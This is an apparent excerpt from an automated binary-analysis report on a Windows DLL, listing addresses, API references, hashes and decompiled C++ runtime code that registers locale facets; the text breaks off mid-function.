0x6d48fc5c
0x6d48fc23
0x6d48fc23
0x00000000
0x6d48fc23
0x6d48fc21
0x6d48fb94
0x6d48fb94
0x6d48fb97
0x6d48fb9b
0x6d48fb9f
0x6d48fbac
0x6d48fbb4
0x6d48fbb6
0x00000000
0x6d48fbb6
0x6d48fb7d
0x6d48fb7d
0x00000000
0x6d48fb7d
0x6d48fb7b
0x6d48faee
0x6d48faee
0x6d48faf1
0x6d48faf5
0x6d48faf9
0x6d48fb06
0x6d48fb0e
0x6d48fb10
0x00000000
0x6d48fb10
0x6d48fad7
0x6d48fad7
0x00000000
0x6d48fad7
0x6d48fad5
0x6d48fa48
0x6d48fa48
0x6d48fa4b
0x6d48fa4f
0x6d48fa53
0x6d48fa60
0x6d48fa68
0x6d48fa6a
0x00000000
0x6d48fa6a
0x6d48fa31
0x6d48fa31
0x00000000
0x6d48fa31
0x6d48fa2f
0x6d48f9a2
0x6d48f9a2
0x6d48f9a5
0x6d48f9a9
0x6d48f9ad
0x6d48f9ba
0x6d48f9c2
0x6d48f9c4
0x00000000
0x6d48f9c4
0x6d48f98b
0x6d48f98b
0x00000000
0x6d48f98b
0x6d48f989
0x6d48f8fc
0x6d48f8fc
0x6d48f8ff
0x6d48f903
0x6d48f907
0x6d48f914
0x6d48f91c
0x6d48f91e
0x00000000
0x6d48f91e
0x6d48f8e5
0x6d48f8e5
0x00000000
0x6d48f8e5
0x6d48f8e3
0x6d48f856
0x6d48f856
0x6d48f859
0x6d48f85d
0x6d48f861
0x6d48f86e
0x6d48f876
0x6d48f878
0x00000000
0x6d48f878
0x6d48f83f
0x6d48f83f
0x00000000
0x6d48f83f
0x6d48f83d
0x6d48f7b0
0x6d48f7b0
0x6d48f7b3
0x6d48f7b7
0x6d48f7bb
0x6d48f7c8
0x6d48f7d0
0x6d48f7d2
0x00000000
0x6d48f7d2
0x6d48f799
0x6d48f799
0x00000000
0x6d48f799
0x6d48f797
0x6d48f70a
0x6d48f70a
0x6d48f70d
0x6d48f711
0x6d48f715
0x6d48f722
0x6d48f72a
0x6d48f72c
0x00000000
0x6d48f72c
0x6d48f6f3
0x6d48f6f3
0x00000000
0x6d48f6f3
0x6d48f6f1
0x6d48f664
0x6d48f664
0x6d48f667
0x6d48f66b
0x6d48f66f
0x6d48f67c
0x6d48f684
0x6d48f686
0x00000000
0x6d48f686
0x6d48f64d
0x6d48f64d
0x00000000
0x6d48f64d
0x6d48f64b

APIs

__EH_prolog3.LIBCMT ref: 6D48F614
std::_Lockit::_Lockit.LIBCPMT ref: 6D48F61E
int.LIBCPMT ref: 6D48F635

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

moneypunct.LIBCPMT ref: 6D48F658
std::_Facet_Register.LIBCPMT ref: 6D48F66F
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F68F
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F6AD

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: ad86ba0c0db8dad46c972ac625ad92d57bb4ebaac78d86e7cba7e7c878addc79
Instruction ID: 1ec6dc54ee9f83254654b7eb81642b99eb5018db73a59d9fd64be1568c9ae4ef
Opcode Fuzzy Hash: ad86ba0c0db8dad46c972ac625ad92d57bb4ebaac78d86e7cba7e7c878addc79
Instruction Fuzzy Hash: 6B11E07580825A9BCF05EBA0C840FEDBB74AFA4314F2A450DD612BB396CB70DD0187E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F183, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6D48F183(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t265;
				signed int _t266;
				void* _t278;
				void* _t291;
				void* _t304;
				void* _t317;
				void* _t330;
				void* _t343;
				void* _t356;
				void* _t369;
				void* _t382;
				void* _t395;
				void* _t408;
				void* _t421;
				void* _t434;
				void* _t447;
				void* _t460;
				void* _t473;
				void* _t486;
				signed int _t701;
				signed int _t759;
				signed int _t760;
				signed int _t761;
				signed int _t762;
				signed int _t763;
				signed int _t764;
				signed int _t765;
				signed int _t766;
				signed int _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t771;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t790;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				signed int _t795;
				void* _t814;

				_t756 = __edx;
				_t575 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t814 - 0x14, 0);
				_t777 =  *0x6d546de8; // 0x0
				 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
				 *(_t814 - 0x10) = _t777;
				_t265 = E6D46161C(0x6d546d94);
				_t578 =  *((intOrPtr*)(_t814 + 8));
				_t266 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t265);
				_t758 = _t266;
				if(_t266 != 0) {
					L5:
					E6D4866BA(_t814 - 0x14);
					return E6D4A0075(_t758);
				} else {
					if(_t777 == 0) {
						_push( *((intOrPtr*)(_t814 + 8)));
						_push(_t814 - 0x10);
						__eflags = E6D490EB7(__ebx, _t578, __edx, _t758, _t777) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t814 - 0x20);
							E6D4A3D74(_t814 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t758, _t777, 0x14);
							E6D486653(_t814 - 0x14, 0);
							_t778 =  *0x6d546db8; // 0x0
							 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
							 *(_t814 - 0x10) = _t778;
							_t278 = E6D46161C(0x6d546d6c);
							_t585 =  *((intOrPtr*)(_t814 + 8));
							_t759 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t278);
							__eflags = _t759;
							if(_t759 != 0) {
								L12:
								E6D4866BA(_t814 - 0x14);
								return E6D4A0075(_t759);
							} else {
								__eflags = _t778;
								if(_t778 == 0) {
									_push( *((intOrPtr*)(_t814 + 8)));
									_push(_t814 - 0x10);
									__eflags = E6D490F1F(_t575, _t585, __edx, _t759, _t778) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t814 - 0x20);
										E6D4A3D74(_t814 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t575, _t759, _t778, 0x14);
										E6D486653(_t814 - 0x14, 0);
										_t779 =  *0x6d546dec; // 0x0
										 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
										 *(_t814 - 0x10) = _t779;
										_t291 = E6D46161C(0x6d546d98);
										_t592 =  *((intOrPtr*)(_t814 + 8));
										_t760 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t291);
										__eflags = _t760;
										if(_t760 != 0) {
											L19:
											E6D4866BA(_t814 - 0x14);
											return E6D4A0075(_t760);
										} else {
											__eflags = _t779;
											if(_t779 == 0) {
												_push( *((intOrPtr*)(_t814 + 8)));
												_push(_t814 - 0x10);
												__eflags = E6D490F87(_t575, _t592, __edx, _t760, _t779) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t814 - 0x20);
													E6D4A3D74(_t814 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t575, _t760, _t779, 0x14);
													E6D486653(_t814 - 0x14, 0);
													_t780 =  *0x6d546dbc; // 0x0
													 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
													 *(_t814 - 0x10) = _t780;
													_t304 = E6D46161C(0x6d546d70);
													_t599 =  *((intOrPtr*)(_t814 + 8));
													_t761 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t304);
													__eflags = _t761;
													if(_t761 != 0) {
														L26:
														E6D4866BA(_t814 - 0x14);
														return E6D4A0075(_t761);
													} else {
														__eflags = _t780;
														if(_t780 == 0) {
															_push( *((intOrPtr*)(_t814 + 8)));
															_push(_t814 - 0x10);
															__eflags = E6D490FEF(_t575, _t599, _t756, _t761, _t780) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t814 - 0x20);
																E6D4A3D74(_t814 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t575, _t761, _t780, 0x14);
																E6D486653(_t814 - 0x14, 0);
																_t781 =  *0x6d546df0; // 0x0
																 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																 *(_t814 - 0x10) = _t781;
																_t317 = E6D46161C(0x6d546d9c);
																_t606 =  *((intOrPtr*)(_t814 + 8));
																_t762 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t317);
																__eflags = _t762;
																if(_t762 != 0) {
																	L33:
																	E6D4866BA(_t814 - 0x14);
																	return E6D4A0075(_t762);
																} else {
																	__eflags = _t781;
																	if(_t781 == 0) {
																		_push( *((intOrPtr*)(_t814 + 8)));
																		_push(_t814 - 0x10);
																		__eflags = E6D491057(_t575, _t606, _t756, _t762, _t781) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t814 - 0x20);
																			E6D4A3D74(_t814 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t575, _t762, _t781, 0x14);
																			E6D486653(_t814 - 0x14, 0);
																			_t782 =  *0x6d546dc0; // 0x0
																			 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																			 *(_t814 - 0x10) = _t782;
																			_t330 = E6D46161C(0x6d546d74);
																			_t613 =  *((intOrPtr*)(_t814 + 8));
																			_t763 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t330);
																			__eflags = _t763;
																			if(_t763 != 0) {
																				L40:
																				E6D4866BA(_t814 - 0x14);
																				return E6D4A0075(_t763);
																			} else {
																				__eflags = _t782;
																				if(_t782 == 0) {
																					_push( *((intOrPtr*)(_t814 + 8)));
																					_push(_t814 - 0x10);
																					__eflags = E6D4910BF(_t575, _t613, _t756, _t763, _t782) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t814 - 0x20);
																						E6D4A3D74(_t814 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t575, _t763, _t782, 0x14);
																						E6D486653(_t814 - 0x14, 0);
																						_t783 =  *0x6d546df8; // 0x0
																						 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																						 *(_t814 - 0x10) = _t783;
																						_t343 = E6D46161C(0x6d546da4);
																						_t620 =  *((intOrPtr*)(_t814 + 8));
																						_t764 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t343);
																						__eflags = _t764;
																						if(_t764 != 0) {
																							L47:
																							E6D4866BA(_t814 - 0x14);
																							return E6D4A0075(_t764);
																						} else {
																							__eflags = _t783;
																							if(_t783 == 0) {
																								_push( *((intOrPtr*)(_t814 + 8)));
																								_push(_t814 - 0x10);
																								__eflags = E6D491127(_t575, _t620, _t756, _t764, _t783) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D461438(_t814 - 0x20);
																									E6D4A3D74(_t814 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e83cf, _t575, _t764, _t783, 0x14);
																									E6D486653(_t814 - 0x14, 0);
																									_t784 =  *0x6d546df4; // 0x0
																									 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																									 *(_t814 - 0x10) = _t784;
																									_t356 = E6D46161C(0x6d546da0);
																									_t627 =  *((intOrPtr*)(_t814 + 8));
																									_t765 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t356);
																									__eflags = _t765;
																									if(_t765 != 0) {
																										L54:
																										E6D4866BA(_t814 - 0x14);
																										return E6D4A0075(_t765);
																									} else {
																										__eflags = _t784;
																										if(_t784 == 0) {
																											_push( *((intOrPtr*)(_t814 + 8)));
																											_push(_t814 - 0x10);
																											__eflags = E6D4911AB(_t575, _t627, _t756, _t765, _t784) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D461438(_t814 - 0x20);
																												E6D4A3D74(_t814 - 0x20, 0x6d543504);
																												asm("int3");
																												E6D4A00AC(0x6d4e83cf, _t575, _t765, _t784, 0x14);
																												E6D486653(_t814 - 0x14, 0);
																												_t785 =  *0x6d546dc8; // 0x0
																												 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																												 *(_t814 - 0x10) = _t785;
																												_t369 = E6D46161C(0x6d546d7c);
																												_t634 =  *((intOrPtr*)(_t814 + 8));
																												_t766 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t369);
																												__eflags = _t766;
																												if(_t766 != 0) {
																													L61:
																													E6D4866BA(_t814 - 0x14);
																													return E6D4A0075(_t766);
																												} else {
																													__eflags = _t785;
																													if(_t785 == 0) {
																														_push( *((intOrPtr*)(_t814 + 8)));
																														_push(_t814 - 0x10);
																														__eflags = E6D491230(_t575, _t634, _t756, _t766, _t785) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D461438(_t814 - 0x20);
																															E6D4A3D74(_t814 - 0x20, 0x6d543504);
																															asm("int3");
																															E6D4A00AC(0x6d4e83cf, _t575, _t766, _t785, 0x14);
																															E6D486653(_t814 - 0x14, 0);
																															_t786 =  *0x6d546dc4; // 0x0
																															 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																															 *(_t814 - 0x10) = _t786;
																															_t382 = E6D46161C(0x6d546d78);
																															_t641 =  *((intOrPtr*)(_t814 + 8));
																															_t767 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t382);
																															__eflags = _t767;
																															if(_t767 != 0) {
																																L68:
																																E6D4866BA(_t814 - 0x14);
																																return E6D4A0075(_t767);
																															} else {
																																__eflags = _t786;
																																if(_t786 == 0) {
																																	_push( *((intOrPtr*)(_t814 + 8)));
																																	_push(_t814 - 0x10);
																																	__eflags = E6D4912B4(_t575, _t641, _t756, _t767, _t786) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6D461438(_t814 - 0x20);
																																		E6D4A3D74(_t814 - 0x20, 0x6d543504);
																																		asm("int3");
																																		E6D4A00AC(0x6d4e83cf, _t575, _t767, _t786, 0x14);
																																		E6D486653(_t814 - 0x14, 0);
																																		_t787 =  *0x6d546dd8; // 0x0
																																		 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																		 *(_t814 - 0x10) = _t787;
																																		_t395 = E6D46161C(0x6d546d84);
																																		_t648 =  *((intOrPtr*)(_t814 + 8));
																																		_t768 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t395);
																																		__eflags = _t768;
																																		if(_t768 != 0) {
																																			L75:
																																			E6D4866BA(_t814 - 0x14);
																																			return E6D4A0075(_t768);
																																		} else {
																																			__eflags = _t787;
																																			if(_t787 == 0) {
																																				_push( *((intOrPtr*)(_t814 + 8)));
																																				_push(_t814 - 0x10);
																																				__eflags = E6D491339(_t575, _t648, _t756, _t768, _t787) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6D461438(_t814 - 0x20);
																																					E6D4A3D74(_t814 - 0x20, 0x6d543504);
																																					asm("int3");
																																					E6D4A00AC(0x6d4e83cf, _t575, _t768, _t787, 0x14);
																																					E6D486653(_t814 - 0x14, 0);
																																					_t788 =  *0x6d546db0; // 0x0
																																					 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																					 *(_t814 - 0x10) = _t788;
																																					_t408 = E6D46161C(0x6d546d64);
																																					_t655 =  *((intOrPtr*)(_t814 + 8));
																																					_t769 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t408);
																																					__eflags = _t769;
																																					if(_t769 != 0) {
																																						L82:
																																						E6D4866BA(_t814 - 0x14);
																																						return E6D4A0075(_t769);
																																					} else {
																																						__eflags = _t788;
																																						if(_t788 == 0) {
																																							_push( *((intOrPtr*)(_t814 + 8)));
																																							_push(_t814 - 0x10);
																																							__eflags = E6D4913A1(_t575, _t655, _t756, _t769, _t788) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6D461438(_t814 - 0x20);
																																								E6D4A3D74(_t814 - 0x20, 0x6d543504);
																																								asm("int3");
																																								E6D4A00AC(0x6d4e83cf, _t575, _t769, _t788, 0x14);
																																								E6D486653(_t814 - 0x14, 0);
																																								_t789 =  *0x6d546ddc; // 0x0
																																								 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																								 *(_t814 - 0x10) = _t789;
																																								_t421 = E6D46161C(0x6d546d88);
																																								_t662 =  *((intOrPtr*)(_t814 + 8));
																																								_t770 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t421);
																																								__eflags = _t770;
																																								if(_t770 != 0) {
																																									L89:
																																									E6D4866BA(_t814 - 0x14);
																																									return E6D4A0075(_t770);
																																								} else {
																																									__eflags = _t789;
																																									if(_t789 == 0) {
																																										_push( *((intOrPtr*)(_t814 + 8)));
																																										_push(_t814 - 0x10);
																																										__eflags = E6D491409(_t575, _t662, _t756, _t770, _t789) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6D461438(_t814 - 0x20);
																																											E6D4A3D74(_t814 - 0x20, 0x6d543504);
																																											asm("int3");
																																											E6D4A00AC(0x6d4e83cf, _t575, _t770, _t789, 0x14);
																																											E6D486653(_t814 - 0x14, 0);
																																											_t790 =  *0x6d546de0; // 0x0
																																											 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																											 *(_t814 - 0x10) = _t790;
																																											_t434 = E6D46161C(0x6d546d8c);
																																											_t669 =  *((intOrPtr*)(_t814 + 8));
																																											_t771 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t434);
																																											__eflags = _t771;
																																											if(_t771 != 0) {
																																												L96:
																																												E6D4866BA(_t814 - 0x14);
																																												return E6D4A0075(_t771);
																																											} else {
																																												__eflags = _t790;
																																												if(_t790 == 0) {
																																													_push( *((intOrPtr*)(_t814 + 8)));
																																													_push(_t814 - 0x10);
																																													__eflags = E6D491471(_t575, _t669, _t756, _t771, _t790) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6D461438(_t814 - 0x20);
																																														E6D4A3D74(_t814 - 0x20, 0x6d543504);
																																														asm("int3");
																																														E6D4A00AC(0x6d4e83cf, _t575, _t771, _t790, 0x14);
																																														E6D486653(_t814 - 0x14, 0);
																																														_t791 =  *0x6d546dfc; // 0x0
																																														 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																														 *(_t814 - 0x10) = _t791;
																																														_t447 = E6D46161C(0x6d546da8);
																																														_t676 =  *((intOrPtr*)(_t814 + 8));
																																														_t772 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t447);
																																														__eflags = _t772;
																																														if(_t772 != 0) {
																																															L103:
																																															E6D4866BA(_t814 - 0x14);
																																															return E6D4A0075(_t772);
																																														} else {
																																															__eflags = _t791;
																																															if(_t791 == 0) {
																																																_push( *((intOrPtr*)(_t814 + 8)));
																																																_push(_t814 - 0x10);
																																																__eflags = E6D4914EC(_t575, _t676, _t756, _t772, _t791) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6D461438(_t814 - 0x20);
																																																	E6D4A3D74(_t814 - 0x20, 0x6d543504);
																																																	asm("int3");
																																																	E6D4A00AC(0x6d4e83cf, _t575, _t772, _t791, 0x14);
																																																	E6D486653(_t814 - 0x14, 0);
																																																	_t792 =  *0x6d546dcc; // 0x0
																																																	 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																																	 *(_t814 - 0x10) = _t792;
																																																	_t460 = E6D46161C(0x6d546d80);
																																																	_t683 =  *((intOrPtr*)(_t814 + 8));
																																																	_t773 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t460);
																																																	__eflags = _t773;
																																																	if(_t773 != 0) {
																																																		L110:
																																																		E6D4866BA(_t814 - 0x14);
																																																		return E6D4A0075(_t773);
																																																	} else {
																																																		__eflags = _t792;
																																																		if(_t792 == 0) {
																																																			_push( *((intOrPtr*)(_t814 + 8)));
																																																			_push(_t814 - 0x10);
																																																			__eflags = E6D491558(_t575, _t683, _t756, _t773, _t792) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6D461438(_t814 - 0x20);
																																																				E6D4A3D74(_t814 - 0x20, 0x6d543504);
																																																				asm("int3");
																																																				E6D4A00AC(0x6d4e83cf, _t575, _t773, _t792, 0x14);
																																																				E6D486653(_t814 - 0x14, 0);
																																																				_t793 =  *0x6d546e00; // 0x0
																																																				 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																																				 *(_t814 - 0x10) = _t793;
																																																				_t473 = E6D46161C(0x6d546dac);
																																																				_t690 =  *((intOrPtr*)(_t814 + 8));
																																																				_t774 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t473);
																																																				__eflags = _t774;
																																																				if(_t774 != 0) {
																																																					L117:
																																																					E6D4866BA(_t814 - 0x14);
																																																					return E6D4A0075(_t774);
																																																				} else {
																																																					__eflags = _t793;
																																																					if(_t793 == 0) {
																																																						_push( *((intOrPtr*)(_t814 + 8)));
																																																						_push(_t814 - 0x10);
																																																						__eflags = E6D4915C4(_t575, _t690, _t756, _t774, _t793) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6D461438(_t814 - 0x20);
																																																							E6D4A3D74(_t814 - 0x20, 0x6d543504);
																																																							asm("int3");
																																																							E6D4A00AC(0x6d4e83cf, _t575, _t774, _t793, 0x14);
																																																							E6D486653(_t814 - 0x14, 0);
																																																							_t794 =  *0x6d546dd0; // 0x0
																																																							 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																																							 *(_t814 - 0x10) = _t794;
																																																							_t486 = E6D46161C(0x6d546d60);
																																																							_t697 =  *((intOrPtr*)(_t814 + 8));
																																																							_t775 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t486);
																																																							__eflags = _t775;
																																																							if(_t775 != 0) {
																																																								L124:
																																																								E6D4866BA(_t814 - 0x14);
																																																								return E6D4A0075(_t775);
																																																							} else {
																																																								__eflags = _t794;
																																																								if(_t794 == 0) {
																																																									_push( *((intOrPtr*)(_t814 + 8)));
																																																									_push(_t814 - 0x10);
																																																									__eflags = E6D49162A(_t575, _t697, _t756, _t775, _t794) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										_t701 = _t814 - 0x20;
																																																										E6D461438(_t701);
																																																										E6D4A3D74(_t814 - 0x20, 0x6d543504);
																																																										asm("int3");
																																																										E6D4A00AC(0x6d4e851f, _t575, _t775, _t794, 4);
																																																										_t795 = _t701;
																																																										 *(_t814 - 0x10) = _t795;
																																																										 *((intOrPtr*)(_t795 + 4)) =  *((intOrPtr*)(_t814 + 0xc));
																																																										_push( *((intOrPtr*)(_t814 + 0x14)));
																																																										_t259 = _t814 - 4;
																																																										 *_t259 =  *(_t814 - 4) & 0x00000000;
																																																										__eflags =  *_t259;
																																																										 *_t795 = 0x6d4ec0c4;
																																																										 *((char*)(_t795 + 0x28)) =  *((intOrPtr*)(_t814 + 0x10));
																																																										E6D49542F(_t575, _t701, _t756, _t775, _t795,  *_t259);
																																																										return E6D4A0075(_t795,  *((intOrPtr*)(_t814 + 8)));
																																																									} else {
																																																										_t775 =  *(_t814 - 0x10);
																																																										 *(_t814 - 0x10) = _t775;
																																																										 *(_t814 - 4) = 1;
																																																										E6D486FD3(__eflags, _t775);
																																																										 *0x6d4ea26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t775 + 4))))();
																																																										 *0x6d546dd0 = _t775;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t775 = _t794;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t774 =  *(_t814 - 0x10);
																																																							 *(_t814 - 0x10) = _t774;
																																																							 *(_t814 - 4) = 1;
																																																							E6D486FD3(__eflags, _t774);
																																																							 *0x6d4ea26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t774 + 4))))();
																																																							 *0x6d546e00 = _t774;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t774 = _t793;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t773 =  *(_t814 - 0x10);
																																																				 *(_t814 - 0x10) = _t773;
																																																				 *(_t814 - 4) = 1;
																																																				E6D486FD3(__eflags, _t773);
																																																				 *0x6d4ea26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t773 + 4))))();
																																																				 *0x6d546dcc = _t773;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t773 = _t792;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t772 =  *(_t814 - 0x10);
																																																	 *(_t814 - 0x10) = _t772;
																																																	 *(_t814 - 4) = 1;
																																																	E6D486FD3(__eflags, _t772);
																																																	 *0x6d4ea26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t772 + 4))))();
																																																	 *0x6d546dfc = _t772;
																																																	goto L103;
																																																}
																																															} else {
																																																_t772 = _t791;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t771 =  *(_t814 - 0x10);
																																														 *(_t814 - 0x10) = _t771;
																																														 *(_t814 - 4) = 1;
																																														E6D486FD3(__eflags, _t771);
																																														 *0x6d4ea26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t771 + 4))))();
																																														 *0x6d546de0 = _t771;
																																														goto L96;
																																													}
																																												} else {
																																													_t771 = _t790;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t770 =  *(_t814 - 0x10);
																																											 *(_t814 - 0x10) = _t770;
																																											 *(_t814 - 4) = 1;
																																											E6D486FD3(__eflags, _t770);
																																											 *0x6d4ea26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t770 + 4))))();
																																											 *0x6d546ddc = _t770;
																																											goto L89;
																																										}
																																									} else {
																																										_t770 = _t789;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t769 =  *(_t814 - 0x10);
																																								 *(_t814 - 0x10) = _t769;
																																								 *(_t814 - 4) = 1;
																																								E6D486FD3(__eflags, _t769);
																																								 *0x6d4ea26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t769 + 4))))();
																																								 *0x6d546db0 = _t769;
																																								goto L82;
																																							}
																																						} else {
																																							_t769 = _t788;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t768 =  *(_t814 - 0x10);
																																					 *(_t814 - 0x10) = _t768;
																																					 *(_t814 - 4) = 1;
																																					E6D486FD3(__eflags, _t768);
																																					 *0x6d4ea26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t768 + 4))))();
																																					 *0x6d546dd8 = _t768;
																																					goto L75;
																																				}
																																			} else {
																																				_t768 = _t787;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t767 =  *(_t814 - 0x10);
																																		 *(_t814 - 0x10) = _t767;
																																		 *(_t814 - 4) = 1;
																																		E6D486FD3(__eflags, _t767);
																																		 *0x6d4ea26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t767 + 4))))();
																																		 *0x6d546dc4 = _t767;
																																		goto L68;
																																	}
																																} else {
																																	_t767 = _t786;
																																	goto L68;
																																}
																															}
																														} else {
																															_t766 =  *(_t814 - 0x10);
																															 *(_t814 - 0x10) = _t766;
																															 *(_t814 - 4) = 1;
																															E6D486FD3(__eflags, _t766);
																															 *0x6d4ea26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t766 + 4))))();
																															 *0x6d546dc8 = _t766;
																															goto L61;
																														}
																													} else {
																														_t766 = _t785;
																														goto L61;
																													}
																												}
																											} else {
																												_t765 =  *(_t814 - 0x10);
																												 *(_t814 - 0x10) = _t765;
																												 *(_t814 - 4) = 1;
																												E6D486FD3(__eflags, _t765);
																												 *0x6d4ea26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t765 + 4))))();
																												 *0x6d546df4 = _t765;
																												goto L54;
																											}
																										} else {
																											_t765 = _t784;
																											goto L54;
																										}
																									}
																								} else {
																									_t764 =  *(_t814 - 0x10);
																									 *(_t814 - 0x10) = _t764;
																									 *(_t814 - 4) = 1;
																									E6D486FD3(__eflags, _t764);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t764 + 4))))();
																									 *0x6d546df8 = _t764;
																									goto L47;
																								}
																							} else {
																								_t764 = _t783;
																								goto L47;
																							}
																						}
																					} else {
																						_t763 =  *(_t814 - 0x10);
																						 *(_t814 - 0x10) = _t763;
																						 *(_t814 - 4) = 1;
																						E6D486FD3(__eflags, _t763);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t763 + 4))))();
																						 *0x6d546dc0 = _t763;
																						goto L40;
																					}
																				} else {
																					_t763 = _t782;
																					goto L40;
																				}
																			}
																		} else {
																			_t762 =  *(_t814 - 0x10);
																			 *(_t814 - 0x10) = _t762;
																			 *(_t814 - 4) = 1;
																			E6D486FD3(__eflags, _t762);
																			 *0x6d4ea26c();
